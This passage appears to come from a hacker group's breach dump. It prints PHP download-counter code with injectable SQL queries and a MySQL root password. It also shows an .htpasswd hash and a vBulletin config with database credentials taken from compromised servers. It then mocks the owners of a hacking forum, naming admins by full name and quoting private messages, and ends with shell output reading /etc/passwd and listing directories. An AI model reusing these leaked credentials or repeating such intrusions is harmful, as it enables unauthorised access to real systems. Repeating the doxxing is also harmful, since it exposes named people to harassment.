  3940.  $iso="bt4-r1.iso";
  3941.  $link=choose($iso);
  3942.  
  3943. mysql_connect("localhost",$username,$password);
  3944. @mysql_select_db($database) or die( "Unable to select database");
  3945. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3946. mysql_query($query);
  3947. mysql_close();
  3948.  
  3949.  header( "Location: $link ");
  3950.  exit;
  3951. }
  3952.  
  3953. elseif ($version=="bt4r1vm")
  3954. {
  3955.  $iso="bt4-r1-vm.tar.bz2";
  3956.  $link=choose($iso);
  3957.  
  3958. mysql_connect("localhost",$username,$password);
  3959. @mysql_select_db($database) or die( "Unable to select database");
  3960. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3961. mysql_query($query);
  3962. mysql_close();
  3963.  
  3964.  header( "Location: $link ");
  3965.  exit;
  3966. }
  3967.  
  3968. elseif ($version=="bt4pf")
  3969. {
  3970.  $iso="bt4-pre-final.iso";
  3971.  $link=choose($iso);
  3972.  
  3973. mysql_connect("localhost",$username,$password);
  3974. @mysql_select_db($database) or die( "Unable to select database");
  3975. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3976. mysql_query($query);
  3977. mysql_close();
  3978.  
  3979.  header( "Location: $link ");
  3980.  exit;
  3981. }
  3982.  
  3983. elseif ($version=="bt4b")
  3984. {
  3985.  $iso="bt4-beta.iso";
  3986.  $link=choose($iso);
  3987. mysql_connect("localhost",$username,$password);
  3988. @mysql_select_db($database) or die( "Unable to select database");
  3989. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3990. mysql_query($query);
  3991. mysql_close();
  3992.  header( "Location: $link ");
  3993.  exit;
  3994. }
  3995.  
  3996. elseif ($version=="bt4bvm")
  3997. {
  3998.  $iso="bt4-beta-vm-6.5.1.rar";
  3999.  $link=choose($iso);
  4000. mysql_connect("localhost",$username,$password);
  4001. @mysql_select_db($database) or die( "Unable to select database");
  4002. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  4003. mysql_query($query);
  4004. mysql_close();
  4005.  header( "Location: $link ");
  4006.  exit;
  4007. }
  4008.  
  4009. elseif ($version=="bt3")
  4010. {
  4011.  $iso="bt3-final.iso";
  4012.  $link=choose($iso);
  4013. mysql_connect("localhost",$username,$password);
  4014. @mysql_select_db($database) or die( "Unable to select database");
  4015. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  4016. mysql_query($query);
  4017. mysql_close();
  4018.  header( "Location: $link ");
  4019.  exit;
  4020. }
  4021.  
  4022. else
  4023. {
  4024.  exit;
  4025. }
  4026.  
  4027. ?>
  4028.  
  4029.  
  4030. $ cat s.php
  4031. <?php
  4032.  
  4033.  
  4034. $username="root";
  4035. $password="234hi2u3d98as7d23kuh";
  4036. $database="counter";
  4037.  
  4038.  
  4039.  
  4040. mysql_connect("localhost",$username,$password);
  4041. @mysql_select_db($database) or die( "Unable to select database");
  4042. $query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
  4043. $query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
  4044. $result=mysql_query($query);
  4045. $result2=mysql_query($query2);
  4046. $row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
  4047. $row = mysql_fetch_array($result, MYSQL_ASSOC);
  4048. $numrows1 = $row['numrows'];
  4049. $numrows2 = $row2['numrows'];
  4050. mysql_close();
  4051.  
  4052. $total= round(($numrows1 + $numrows2) * 1.4);
  4053.  
  4054. echo "BackTrack 4 Final - $total unique downloads";
  4055.  
  4056. ?>
  4057.  
  4058. $ cd wiki
  4059.  
  4060. $ ls
  4061.  
  4062. total 700
  4063. drwxr-xr-x. 15 apache apache   4096 Nov 27 16:52 .
  4064. drwxr-xr-x. 13 apache apache   4096 Dec  9 12:21 ..
  4065. -rw-r--r--.  1 apache apache     23 Nov 14 16:01 .htpasswd
  4066. -rw-r--r--.  1 apache apache  17997 Apr  5  2006 COPYING
  4067. -rw-r--r--.  1 apache apache   2073 Jul 27 07:29 CREDITS
  4068. -rw-r--r--.  1 apache apache     76 Jul 27  2009 FAQ
  4069. -rw-r--r--.  1 apache apache 392287 Mar 12  2010 HISTORY
  4070. -rw-r--r--.  1 apache apache     96 Nov 14 16:01 HT
  4071. -rw-r--r--.  1 apache apache   4138 Apr 18  2008 INSTALL
  4072. -rw-r--r--.  1 apache apache   5469 Nov 28 16:45 LocalSettings.php
  4073. -rw-r--r--.  1 apache apache   3649 Nov 11  2008 README
  4074. -rw-r--r--.  1 apache apache  58431 Jul 28 03:11 RELEASE-NOTES
  4075. -rw-r--r--.  1 apache apache    648 May  7  2009 StartProfiler.sample
  4076. -rw-r--r--.  1 apache apache  13307 Mar 25  2010 UPGRADE
  4077. drwxr-xr-x.  2 root   root     4096 Nov 27 16:53 adsense
  4078. -rw-r--r--.  1 apache apache   4707 Feb 15  2010 api.php
  4079. -rw-r--r--.  1 apache apache     25 Feb  3  2008 api.php5
  4080. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 bin
  4081. -rw-r--r--.  1 apache apache   8436 Nov 21 14:24 bt-wiki.png
  4082. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 cache
  4083. drwxr-xr-x.  2 apache apache   4096 Nov 14 15:58 config
  4084. drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 docs
  4085. drwxr-xr-x.  4 apache apache   4096 Nov 28 16:44 extensions
  4086. drwxr-xr-x. 12 apache apache   4096 Nov 23 12:36 images
  4087. -rw-r--r--.  1 apache apache   4031 Oct 14  2009 img_auth.php
  4088. -rw-r--r--.  1 apache apache     31 Feb  3  2008 img_auth.php5
  4089. drwxr-xr-x. 16 apache apache   4096 Jul 28 03:16 includes
  4090. -rw-r--r--.  1 apache apache   4329 Jan  1  2010 index.php
  4091. -rw-r--r--.  1 apache apache     28 Feb  3  2008 index.php5
  4092. drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 languages
  4093. drwxr-xr-x. 13 apache apache  12288 Nov 22 12:55 maintenance
  4094. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 math
  4095. -rw-r--r--.  1 apache apache   3054 Mar 21  2009 opensearch_desc.php
  4096. -rw-r--r--.  1 apache apache     39 Mar  3  2008 opensearch_desc.php5
  4097. -rw-r--r--.  1 apache apache    174 Feb  3  2010 php5.php5
  4098. -rw-r--r--.  1 apache apache   8821 Jul 27 03:40 profileinfo.php
  4099. -rw-r--r--.  1 apache apache    383 Mar 21  2009 redirect.php
  4100. -rw-r--r--.  1 apache apache     31 Feb  3  2008 redirect.php5
  4101. -rw-r--r--.  1 apache apache     89 Feb  3  2010 redirect.phtml
  4102. drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 serialized
  4103. -rwxrwxrwx.  1 root   root     6816 Nov 23 18:29 sitemap.xml
  4104. drwxr-xr-x.  9 apache apache   4096 Nov 28 14:12 skins
  4105. -rw-r--r--.  1 apache apache   4905 Mar  8  2010 thumb.php
  4106. -rw-r--r--.  1 apache apache     29 Feb  3  2008 thumb.php5
  4107. -rw-r--r--.  1 apache apache   1347 Nov  5  2008 trackback.php
  4108. -rw-r--r--.  1 apache apache     32 Mar 16  2009 trackback.php5
  4109. -rw-r--r--.  1 apache apache     86 Feb  3  2010 wiki.phtml
  4110.  
  4111. $ cat .htpasswd
  4112. edbadmin:YE8mle4nG1Z.c
  4113.  
  4114. cd ..
  4115. cat forums/includes/config.php
  4116. <?php
  4117. /*======================================================================*\
  4118. || #################################################################### ||
  4119. || # vBulletin 4.0.0 Patch Level 1
  4120. || # ---------------------------------------------------------------- # ||
  4121. || # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
  4122. || # This file may not be redistributed in whole or significant part. # ||
  4123. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  4124. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  4125. || #################################################################### ||
  4126. \*======================================================================*/
  4127.  
  4128. /*-------------------------------------------------------*\
  4129. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  4130. +---------------------------------------------------------+
  4131. | If you get any errors while attempting to connect to    |
  4132. | MySQL, you will need to email your webhost because we   |
  4133. | cannot tell you the correct values for the variables    |
  4134. | in this file.                                           |
  4135. \*-------------------------------------------------------*/
  4136.  
  4137.  // ****** DATABASE TYPE ******
  4138.  // This is the type of the database server on which your vBulletin database will be located.
  4139.  // Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  4140.  // for slave options just append _slave to your preferred database type.
  4141. $config['Database']['dbtype'] = 'mysql';
  4142.  
  4143.  // ****** DATABASE NAME ******
  4144.  // This is the name of the database where your vBulletin will be located.
  4145.  // This must be created by your webhost.
  4146. $config['Database']['dbname'] = 'forums';
  4147.  
  4148.  // ****** TABLE PREFIX ******
  4149.  // Prefix that your vBulletin tables have in the database.
  4150. $config['Database']['tableprefix'] = '';
  4151.  
  4152.  // ****** TECHNICAL EMAIL ADDRESS ******
  4153.  // If any database errors occur, they will be emailed to the address specified here.
  4154.  // Leave this blank to not send any emails when there is a database error.
  4155. $config['Database']['technicalemail'] = 'muts@offsec.com';
  4156.  
  4157.  // ****** FORCE EMPTY SQL MODE ******
  4158.  // New versions of MySQL (4.1+) have introduced some behaviors that are
  4159.  // incompatible with vBulletin. Setting this value to "true" disables those
  4160.  // behaviors. You only need to modify this value if vBulletin recommends it.
  4161. $config['Database']['force_sql_mode'] = false;
  4162.  
  4163.  
  4164.  
  4165.  // ****** MASTER DATABASE SERVER NAME AND PORT ******
  4166.  // This is the hostname or IP address and port of the database server.
  4167.  // If you are unsure of what to put here, leave the default values.
  4168. $config['MasterServer']['servername'] = 'localhost';
  4169. $config['MasterServer']['port'] = 3306;
  4170.  
  4171.  // ****** MASTER DATABASE USERNAME & PASSWORD ******
  4172.  // This is the username and password you use to access MySQL.
  4173.  // These must be obtained through your webhost.
  4174. $config['MasterServer']['username'] = 'root';
  4175. $config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';
  4176.  
  4177.  // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  4178.  // This option allows you to turn persistent connections to MySQL on or off.
  4179.  // The difference in performance is negligible for all but the largest boards.
  4180.  // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  4181. $config['MasterServer']['usepconnect'] = 0;
  4182.  
  4183.  
  4184.  
  4185.  // ****** SLAVE DATABASE CONFIGURATION ******
  4186.  // If you have multiple database backends, this is the information for your slave
  4187.  // server. If you are not 100% sure you need to fill in this information,
  4188.  // do not change any of the values here.
  4189. $config['SlaveServer']['servername'] = '';
  4190. $config['SlaveServer']['port'] = 3306;
  4191. $config['SlaveServer']['username'] = '';
  4192. $config['SlaveServer']['password'] = '';
  4193. $config['SlaveServer']['usepconnect'] = 0;
  4194.  
  4195.  
  4196.  
  4197.  // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  4198.  // This setting allows you to change the name of the folders that the admin and
  4199.  // moderator control panels reside in. You may wish to do this for security purposes.
  4200.  // Please note that if you change the name of the directory here, you will still need
  4201.  // to manually change the name of the directory on the server.
  4202. $config['Misc']['admincpdir'] = 'admincphaha';
  4203. $config['Misc']['modcpdir'] = 'modcphaha';
  4204.  
  4205.  // Prefix that all vBulletin cookies will have
  4206.  // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  4207. $config['Misc']['cookieprefix'] = 'bb';
  4208.  
  4209.  // ******** FULL PATH TO FORUMS DIRECTORY ******
  4210.  // On a few systems it may be necessary to input the full path to your forums directory
  4211.  // for vBulletin to function normally. You can ignore this setting unless vBulletin
  4212.  // tells you to fill this in. Do not include a trailing slash!
  4213.  // Example Unix:
  4214.  //   $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  4215.  // Example Win32:
  4216.  //   $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  4217. $config['Misc']['forumpath'] = '';
  4218.  
  4219.  
  4220.  
  4221.  // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  4222.  // The users specified here will be allowed to view the admin log in the control panel.
  4223.  // Users must be specified by *ID number* here. To obtain a user's ID number,
  4224.  // view their profile via the control panel. If this is a new installation, leave
  4225.  // the first user created will have a user ID of 1. Seperate each userid with a comma.
  4226. $config['SpecialUsers']['canviewadminlog'] = '1';
  4227.  
  4228.  // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  4229.  // The users specified here will be allowed to remove ("prune") entries from the admin
  4230.  // log. See the above entry for more information on the format.
  4231. $config['SpecialUsers']['canpruneadminlog'] = '1';
  4232.  
  4233.  // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  4234.  // The users specified here will be allowed to run queries from the control panel.
  4235.  // See the above entries for more information on the format.
  4236.  // Please note that the ability to run queries is quite powerful. You may wish
  4237.  // to remove all user IDs from this list for security reasons.
  4238. $config['SpecialUsers']['canrunqueries'] = '';
  4239.  
  4240.  // ****** UNDELETABLE / UNALTERABLE USERS ******
  4241.  // The users specified here will not be deletable or alterable from the control panel by any users.
  4242.  // To specify more than one user, separate userids with commas.
  4243. $config['SpecialUsers']['undeletableusers'] = '';
  4244.  
  4245.  // ****** SUPER ADMINISTRATORS ******
  4246.  // The users specified below will have permission to access the administrator permissions
  4247.  // page, which controls the permissions of other administrators
  4248. $config['SpecialUsers']['superadministrators'] = '1,2';
  4249.  
  4250.  // ****** DATASTORE CACHE CONFIGURATION *****
  4251.  // Here you can configure different methods for caching datastore items.
  4252.  // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  4253.  // vB_Datastore_APC - to use APC
  4254.  // vB_Datastore_XCache - to use XCache
  4255.  // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  4256. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  4257.  
  4258.  // ******** DATASTORE PREFIX ******
  4259.  // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  4260.  // than one set of forums installed on your host, you *may* need to use a prefix
  4261.  // so that they do not try to use the same variable within the cache.
  4262.  // This works in a similar manner to the database table prefix.
  4263. // $config['Datastore']['prefix'] = '';
  4264.  
  4265.  // It is also necessary to specify the hostname or IP address and the port the server is listening on
  4266. /*
  4267. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  4268. $i = 0;
  4269. // First Server
  4270. $i++;
  4271. $config['Misc']['memcacheserver'][$i]   = '127.0.0.1';
  4272. $config['Misc']['memcacheport'][$i]      = 11211;
  4273. $config['Misc']['memcachepersistent'][$i] = true;
  4274. $config['Misc']['memcacheweight'][$i]   = 1;
  4275. $config['Misc']['memcachetimeout'][$i]   = 1;
  4276. $config['Misc']['memcacheretry_interval'][$i] = 15;
  4277. */
  4278.  
  4279. // ****** The following options are only needed in special cases ******
  4280.  
  4281.  // ****** MySQLI OPTIONS *****
  4282.  // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  4283.  // If you need to set the default connection charset because your database
  4284.  // is using a charset other than latin1, you can set the charset here.
  4285.  // If you don't set the charset to be the same as your database, you
  4286.  // may receive collation errors.  Ignore this setting unless you
  4287.  // are sure you need to use it.
  4288. // $config['Mysqli']['charset'] = 'utf8';
  4289.  
  4290.  // Optionally, PHP can be instructed to set connection parameters by reading from the
  4291.  // file named in 'ini_file'. Please use a full path to the file.
  4292.  // Example:
  4293.  // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  4294. $config['Mysqli']['ini_file'] = '';
  4295.  
  4296. // Image Processing Options
  4297.  // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  4298. $config['Misc']['maxwidth'] = 2592;
  4299. $config['Misc']['maxheight'] = 1944;
  4300.  
  4301. /*======================================================================*\
  4302. || ####################################################################
  4303. || # Downloaded: 22:25, Sat Jan 9th 2010
  4304. || # CVS: $RCSfile$ - $Revision: 32878 $
  4305. || ####################################################################
  4306. \*======================================================================*/
  4307.  
  4308.  
  4309.  ____________________________________________________|_._._._._._._._,
  4310.  \___________________________________________________|_|_|_|_|_|_|_|_|
  4311.                                                      ! ~ free-hack ~  
  4312.                                                                      
  4313. Many people will wonder why we owned  Free-Hack  because  they  always
  4314. claimed to have nothing to do with fraud and stuff. In  fact  this  is
  4315. the second time we owned them but the first time  we  go  public.  The
  4316. first time was a few months ago in order to check out what  they  were
  4317. doing in their internal eleet priv8 sections.  To  our  surprise  they
  4318. really had nothing to do with fraud.  Still,  they  are  part  of  the
  4319. problem we call the skiddy breeding of lameness.                      
  4320.                                                                      
  4321. Actually, there are a few communities where you can find a few skilled
  4322. members. Free-Hack is a forum where you can find  two  or  three.  The
  4323. rest are simple skidi0ts who have no right to even exist, let alone be
  4324. on our internet. Also  the  admins,  particularly  "Suicide"  aka  Mr.
  4325. Stefan Finke or  "enco"  aka  Mr.  Enrico  Costanzo  are  nothing  but
  4326. arrogant asshats whose only apparent  talent  appears  to  be  banning
  4327. people. Oh wait, "Suicide" actually HAS skill. Like  he  mastered  the
  4328. usage of Hydra and is now able to hax every Teamspeak  server.  Ph33r.
  4329. Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
  4330. guy, who had the right spirit and was willing to  learn.  But  getting
  4331. promoted to admin in a "hacker" community with ~40k users which has an
  4332. "expert" zone for "skilled" members who talk about how to  bypass  the
  4333. Webspell SQL Injection filter is the worst thing he could have done...
  4334.                                                                      
  4335.  ____________________________________________________________________
  4336. |                         __          __                             |
  4337. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  4338. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  4339. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  4340. |________|__|________________________________________________________|
  4341. |                                                                    |
  4342. | Suicide:                                                           |
  4343. | I miss the stress, the adrenaline, the hatred you built up toward  |
  4344. | and because of certain users. In those five years there was so     |
  4345. | much trouble (Fettemama, Hacksector, CIA-World, Grey-Hats,         |
  4346. | Black-Hats, Mbk, Speedtest). Why doesn't anyone want to pick a     |
  4347. | fight with us anymore?                                             |
  4348. |____________________________________________________________________|
  4349.                                                                      
  4350. You can have that. There's quite alot of hilarity left in the database
  4351. backups we prepared. Do not forget to have a  look  for  yourself.  We
  4352. especially liked that guy who trolled  fred777  by  logging  into  his
  4353. account:                                                              
  4354.                                                                      
  4355.  ____________________________________________________________________
  4356. |                         __          __                             |
  4357. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  4358. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  4359. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  4360. |________|__|________________________________________________________|
  4361. |                                                                    |
  4362. |  PM from fred777 to enco:                                          |
  4363. |  Hello,                                                            |
  4364. |                                                                    |
  4365. |  please change my name to "Wurstkoenig". Many thanks               |
  4366. |                                                                    |
  4367. |  fred777                                                           |
  4368. |____________________________________________________________________|
  4369.                                                                      
  4370. That one really worked. GG mate!                                      
  4371.                                                                      
  4372.  ____________________________________________________________________
  4373. |                         __          __                             |
  4374. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  4375. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  4376. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  4377. |________|__|________________________________________________________|
  4378. |                                                                    |
  4379. | Suicide:                                                           |
  4380. | Why move at all? The new server has roughly the same attributes    |
  4381. | as the current one. On top of that, the firewall is being made     |
  4382. | twice as strong. As an overall package I come out better than      |
  4383. | in the current situation.                                          |
  4384. |____________________________________________________________________|
  4385.                                                                      
  4386. Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
  4387. Too ninja again.                                                      
  4388.  
  4389. $ uname -a
  4390. Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
  4391.  
  4392. $ id
  4393. uid=508(freehack) gid=504(freehack) groups=504(freehack)
  4394.  
  4395. $ cat /etc/passwd
  4436.  
  4437.  
  4438. $ ls -la /
  4439. total 108
  4440. drwxr-xr-x  24 root root  4096 Nov 30 02:12 .
  4441. drwxr-xr-x  24 root root  4096 Nov 30 02:12 ..
  4442. -rw-r--r--   1 root root     0 Nov 30 02:12 .autofsck
  4443. -rw-r--r--   1 root root     0 Jan 17  2009 .autorelabel
  4444. drwx------   2 root  500  4096 Nov 11 18:43 .spamassassin
  4445. lrwxrwxrwx   1 root root    39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
  4446. lrwxrwxrwx   1 root root    38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
  4447. drwx--x--x   3 root root  4096 Nov 13 09:00 backup
  4448. drwxr-xr-x   2 root root  4096 Nov 17 00:24 bin
  4449. drwxr-xr-x   2 root root  4096 Jan 26  2010 boot
  4450. drwxr-xr-x   7 root root  1900 Nov 30 02:12 dev
  4451. drwxr-xr-x  68 root root 12288 Dec  8 21:35 etc
  4452. drwx--x--x   8 root root  4096 Nov 14 07:11 home
  4453. drwxr-xr-x   9 root root  4096 Nov 12 08:24 lib
  4454. drwxr-xr-x   7 root root  4096 Nov 12 08:24 lib64
  4455. drwxr-xr-x   2 root root  4096 Jan 26  2010 media
  4456. drwxr-xr-x   2 root root  4096 Jan 26  2010 mnt
  4457. drwxr-xr-x  10 root root  4096 Nov 12 16:31 opt
  4458. dr-xr-xr-x 113 root root     0 Nov 30 02:12 proc
  4459. drwxr-x---  14 root root  4096 Dec  8 21:36 root
  4460. drwxr-xr-x   2 root root  4096 Nov 17 00:24 sbin
  4461. drwxr-xr-x   5 root root 20480 Dec  8 00:24 scripts
  4462. drwxr-xr-x   2 root root  4096 Jan 26  2010 selinux
  4463. drwxr-xr-x   2 root root  4096 Jan 26  2010 srv
  4464. drwxr-xr-x   3 root root     0 Nov 30 02:12 sys
  4465. drwxrwxrwt  10 root root  4096 Dec  8 21:36 tmp
  4466. drwxr-xr-x  16 root root  4096 Nov 11 18:17 usr
  4467. drwxr-xr-x  22 root root  4096 Nov 11 18:01 var
  4468.  
  4469. $ ls -la /home/freehack/public_html
  4470. total 3100
  4471. drwxr-x--- 34 freehack nobody     4096 Dec  4 22:13 .
  4472. drwx--x--x 14 freehack freehack   4096 Dec  7 11:15 ..
  4473. -rw-r--r--  1 freehack freehack   1086 Dec  4 22:27 .htaccess
  4474. drwxr-xr-x 11 freehack freehack   4096 Nov 14 09:24 2tgh9322132k322l1sd
  4475. -rw-r--r--  1 freehack freehack   6726 Jan 18  2010 LICENSE
  4476. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _private
  4477. drwxr-xr-x  4 freehack freehack   4096 Nov 14 08:28 _vti_bin
  4478. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_cnf
  4479. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_log
  4480. drwxr-x---  2 freehack nobody     4096 Nov 14 07:11 _vti_pvt
  4481. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_txt
  4482. -rw-r--r--  1 freehack freehack  19341 Jan 18  2010 accessmask.php
  4483. -rw-r--r--  1 freehack freehack  12687 Jan 18  2010 admin_rbs.php
  4484. -rw-r--r--  1 freehack freehack   2645 Jan 18  2010 admin_rbs_banner_list.php
  4485. -rw-r--r--  1 freehack freehack   3089 Jan 18  2010 admin_rbs_convert.php
  4486. -rw-r--r--  1 freehack freehack   2667 Jan 18  2010 admin_rbs_d_banner_list.php
  4487. -rw-r--r--  1 freehack freehack   2668 Jan 18  2010 admin_rbs_h_banner_list.php
  4488. -rw-r--r--  1 freehack freehack   2668 Jan 18  2010 admin_rbs_v_banner_list.php
  4489. -rw-r--r--  1 freehack freehack   2681 Jan 18  2010 admin_rbs_x_banner_list.php
  4490. -rw-r--r--  1 freehack freehack  39582 Jan 18  2010 admincalendar.php
  4491. -rw-r--r--  1 freehack freehack  49644 Jan 18  2010 admininfraction.php
  4492. -rw-r--r--  1 freehack freehack  19150 Jan 18  2010 adminlog.php
  4493. -rw-r--r--  1 freehack freehack   8149 Jan 18  2010 adminpermissions.php
  4494. -rw-r--r--  1 freehack freehack  25516 Jan 18  2010 adminreputation.php
  4495. -rw-r--r--  1 freehack freehack   1230 Jan 18  2010 ads.php
  4496. -rw-r--r--  1 freehack freehack  23844 Jan 18  2010 ajax.php
  4497. -rw-r--r--  1 freehack freehack  75511 Jan 18  2010 album.php
  4498. drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:04 amecache
  4499. -rw-r--r--  1 freehack freehack  17137 Jan 18  2010 announcement.php
  4500. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:04 archive
  4501. -rw-r--r--  1 freehack freehack  18309 Jan 18  2010 attachment.php
  4502. -rw-r--r--  1 freehack freehack  12512 Jan 18  2010 attachmentpermission.php
  4503. -rw-r--r--  1 freehack freehack  80983 Jan 18  2010 automediaembed_admin.php
  4504. -rw-r--r--  1 freehack freehack   1979 Jan 18  2010 autorefresh_footer.php
  4505. -rw-r--r--  1 freehack freehack   1979 Jan 18  2010 autorefresh_header.php
  4506. -rw-r--r--  1 freehack freehack   1991 Jan 18  2010 autorefresh_navbar.php
  4507. -rw-r--r--  1 freehack freehack   1430 Jan 18  2010 autotagger_ajax.php
  4508. -rw-r--r--  1 freehack freehack  19355 Jan 18  2010 avatar.php
  4509. -rw-r--r--  1 freehack freehack  46771 Jan 18  2010 banner.png
  4510. -rw-r--r--  1 freehack freehack  16461 Jan 18  2010 bbcode.php
  4511. drwxr-xr-x  6 freehack freehack   4096 Nov 14 08:06 bilder
  4512. drwxr-xr-x  8 freehack freehack   4096 Nov 25 14:18 blog
  4513. -rw-r--r--  1 freehack freehack  14782 Jan 18  2010 bookmarksite.php
  4514. -rw-r--r--  1 freehack freehack  75327 Jan 18  2010 calendar.php
  4515. -rw-r--r--  1 freehack freehack  12083 Jan 18  2010 calendarpermission.php
  4516. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 cgi-bin
  4517. -rw-r--r--  1 freehack freehack     43 Jan 18  2010 clear.gif
  4518. drwxr-xr-x  4 freehack freehack   4096 Nov 14 08:08 clientscript
  4519. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:08 control_examples
  4520. -rw-r--r--  1 freehack freehack  14938 Jan 18  2010 converse.php
  4521. drwxr-xr-x  3 freehack freehack   4096 Nov 18 14:14 cpa
  4522. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:11 cpm
  4523. drwxr-xr-x  7 freehack freehack   4096 Nov 14 08:12 cpstyles
  4524. -rw-r--r--  1 freehack freehack   3317 Jan 18  2010 cron.php
  4525. -rw-r--r--  1 freehack freehack  24049 Jan 18  2010 cronadmin.php
  4526. -rw-r--r--  1 freehack freehack  10734 Jan 18  2010 cronlog.php
  4527. -rw-r--r--  1 freehack freehack  34087 Jan 18  2010 css.php
  4528. drwxrwxrwx  3 freehack freehack   4096 Nov 14 08:13 customavatars
  4529. drwxrwxrwx  3 freehack freehack   4096 Nov 14 08:13 customgroupicons
  4530. drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:13 customprofilepics
  4531. -rw-r--r--  1 freehack freehack  21833 Jan 18  2010 diagnostic.php
  4532. -rw-r--r--  1 freehack freehack  47757 Jan 18  2010 editpost.php
  4533. -rw-r--r--  1 freehack freehack  11748 Jan 18  2010 email.php
  4534. -rw-r--r--  1 freehack freehack  29500 Jan 18  2010 external.php
  4535. -rw-r--r--  1 freehack freehack   9786 Jan 18  2010 faq.php
  4536. -rw-r--r--  1 freehack freehack  22486 Jan 18  2010 favicon.ico
  4537. -rw-r--r--  1 freehack freehack  30137 Jan 18  2010 forum.php
  4538. -rw-r--r--  1 freehack freehack  35658 Jan 18  2010 forumdisplay.php
  4539. -rw-r--r--  1 freehack freehack  30063 Jan 18  2010 forumpermission.php
  4540. -rw-r--r--  1 freehack freehack  15499 Oct 11 10:03 gla_test.php
  4541. -rw-r--r--  1 freehack freehack  39830 Jan 18  2010 global.php
  4542. -rw-r--r--  1 freehack freehack     53 Oct 24 14:48 googlef4001cc5b1db090b.html
  4543. -rw-r--r--  1 freehack freehack 137885 Jan 18  2010 group.php
  4544. -rw-r--r--  1 freehack freehack  24919 Jan 18  2010 group_inlinemod.php
  4545. -rw-r--r--  1 freehack freehack  10524 Jan 18  2010 groupsubscription.php
  4546. -rw-r--r--  1 freehack freehack  25922 Jan 18  2010 help.php
  4547. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:13 htaccess
  4548. -rw-r--r--  1 freehack freehack   9047 Jan 18  2010 image.php
  4549. drwxr-xr-x 20 freehack freehack   4096 Nov 14 08:51 images
  4550. drwxr-xr-x  5 freehack freehack   4096 Nov 14 08:52 img
  4551. drwxr-xr-x  7 freehack freehack  12288 Dec  4 22:09 includes
  4552. -rw-r--r--  1 freehack freehack  19592 Jan 18  2010 index.php
  4553. -rw-r--r--  1 freehack freehack  43829 Jan 18  2010 infraction.php
  4554. -rw-r--r--  1 freehack freehack 182759 Jan 18  2010 inlinemod.php
  4555. -rw-r--r--  1 freehack freehack  10342 Jan 18  2010 joinrequests.php
  4556. -rw-r--r--  1 freehack freehack  10222 Jan 18  2010 login.php
  4557. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:59 madp
  4558. -rw-r--r--  1 freehack freehack  17066 Jan 18  2010 member.php
  4559. -rw-r--r--  1 freehack freehack  15931 Jan 18  2010 member_inlinemod.php
  4560. -rw-r--r--  1 freehack freehack  35901 Jan 18  2010 memberlist.php
